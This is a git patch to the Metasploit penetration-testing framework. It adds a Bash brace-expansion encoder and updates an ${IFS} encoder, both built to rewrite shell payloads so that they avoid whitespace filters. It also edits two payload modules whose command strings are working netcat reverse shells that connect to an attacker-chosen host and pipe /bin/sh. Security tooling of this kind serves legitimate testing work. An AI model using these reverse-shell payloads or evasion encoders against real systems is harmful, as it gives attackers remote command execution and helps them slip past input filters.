From 0294d7eed1920a1803cdba93d1437e84eab0641f Mon Sep 17 00:00:00 2001
From: Brent Cook <busterb@gmail.com>
Date: Sat, 25 Aug 2018 22:23:07 -0500
Subject: [PATCH] Land #10516, Add brace expansion encoder and update ${IFS}
 encoder

---
 lib/msf/core/encoder.rb                       |  8 +++-
 modules/encoders/cmd/brace.rb                 | 33 +++++++++++++++
 modules/encoders/cmd/ifs.rb                   | 40 +++++++------------
 .../singles/cmd/unix/reverse_netcat.rb        |  2 +-
 .../singles/cmd/unix/reverse_netcat_gaping.rb |  4 +-
 5 files changed, 57 insertions(+), 30 deletions(-)
 create mode 100644 modules/encoders/cmd/brace.rb

diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb
index dc912a7dbe..b7209576d9 100644
--- a/lib/msf/core/encoder.rb
+++ b/lib/msf/core/encoder.rb
@@ -136,9 +136,13 @@ class Encoder < Module
     #
     CmdUnixEcho = 'echo'
     #
-    # Bourne shell IFS encoding.
+    # Bourne shell ${IFS} encoding.
     #
-    CmdUnixIfs = 'ifs'
+    CmdUnixIFS = 'ifs'
+    #
+    # Bash brace expansion encoding.
+    #
+    CmdUnixBrace = 'brace'
   end
 
   #
diff --git a/modules/encoders/cmd/brace.rb b/modules/encoders/cmd/brace.rb
new file mode 100644
index 0000000000..4c96a122a9
--- /dev/null
+++ b/modules/encoders/cmd/brace.rb
@@ -0,0 +1,33 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder
+
+  # This may produce incorrect code due to minimal escaping
+  Rank = LowRanking
+
+  def initialize
+    super(
+      'Name'        => 'Bash Brace Expansion Command Encoder',
+      'Description' => %q{
+        This encoder uses brace expansion in Bash and other shells
+        to avoid whitespace without being overly fancy.
+      },
+      'Author'      => ['wvu', 'egypt'],
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'EncoderType' => Msf::Encoder::Type::CmdUnixBrace
+    )
+  end
+
+  def encode_block(state, buf)
+    # Skip encoding if there are no badchars
+    return buf if state.badchars !~ /\s/
+
+    # Perform brace expansion encoding
+    "{#{buf.gsub(',', '\\,').gsub(/\s+/, ',')}}"
+  end
+
+end
diff --git a/modules/encoders/cmd/ifs.rb b/modules/encoders/cmd/ifs.rb
index 2f2046ad3c..5c849db97e 100644
--- a/modules/encoders/cmd/ifs.rb
+++ b/modules/encoders/cmd/ifs.rb
@@ -5,39 +5,29 @@
 
 class MetasploitModule < Msf::Encoder
 
-  # Below normal ranking because this will produce incorrect code a lot of
-  # the time.
+  # This may produce incorrect code, such as in quoted strings
   Rank = LowRanking
 
   def initialize
     super(
-      'Name'             => 'Generic ${IFS} Substitution Command Encoder',
-      'Description'      => %q{
-        This encoder uses standard Bourne shell variable substitution
-        to avoid spaces without being overly fancy.
+      'Name'        => 'Bourne ${IFS} Substitution Command Encoder',
+      'Description' => %q{
+        This encoder uses Bourne ${IFS} substitution to avoid whitespace
+        without being overly fancy.
       },
-      'Author'           => 'egypt',
-      'Arch'             => ARCH_CMD,
-      'Platform'         => 'unix',
-      'EncoderType'      => Msf::Encoder::Type::CmdUnixIfs)
+      'Author'      => ['egypt', 'wvu'],
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'EncoderType' => Msf::Encoder::Type::CmdUnixIFS
+    )
   end
 
-
-  #
-  # Encodes the payload
-  #
   def encode_block(state, buf)
-    # Skip encoding for empty badchars
-    if state.badchars.length == 0
-      return buf
-    end
+    # Skip encoding if there are no badchars
+    return buf if state.badchars !~ /\s/
 
-    # Skip encoding unless space is a badchar
-    unless state.badchars.include?(" ")
-      return buf
-    end
-
-    buf.gsub!(/\s/, '${IFS}')
-    return buf
+    # Perform ${IFS} encoding
+    buf.gsub(/\s+/, '${IFS}')
   end
+
 end
diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat.rb b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
index 2579046f17..595efb0160 100644
--- a/modules/payloads/singles/cmd/unix/reverse_netcat.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat.rb
@@ -51,6 +51,6 @@ module MetasploitModule
   #
   def command_string
     backpipe = Rex::Text.rand_text_alpha_lower(4+rand(4))
-    "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe} "
+    "mkfifo /tmp/#{backpipe}; nc #{datastore['LHOST']} #{datastore['LPORT']} 0</tmp/#{backpipe} | /bin/sh >/tmp/#{backpipe} 2>&1; rm /tmp/#{backpipe}"
   end
 end
diff --git a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
index 6943ba8722..e58fa15740 100644
--- a/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_netcat_gaping.rb
@@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 35
+  CachedSize = 34
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -45,6 +45,6 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh "
+    "nc #{datastore['LHOST']} #{datastore['LPORT']} -e /bin/sh"
   end
 end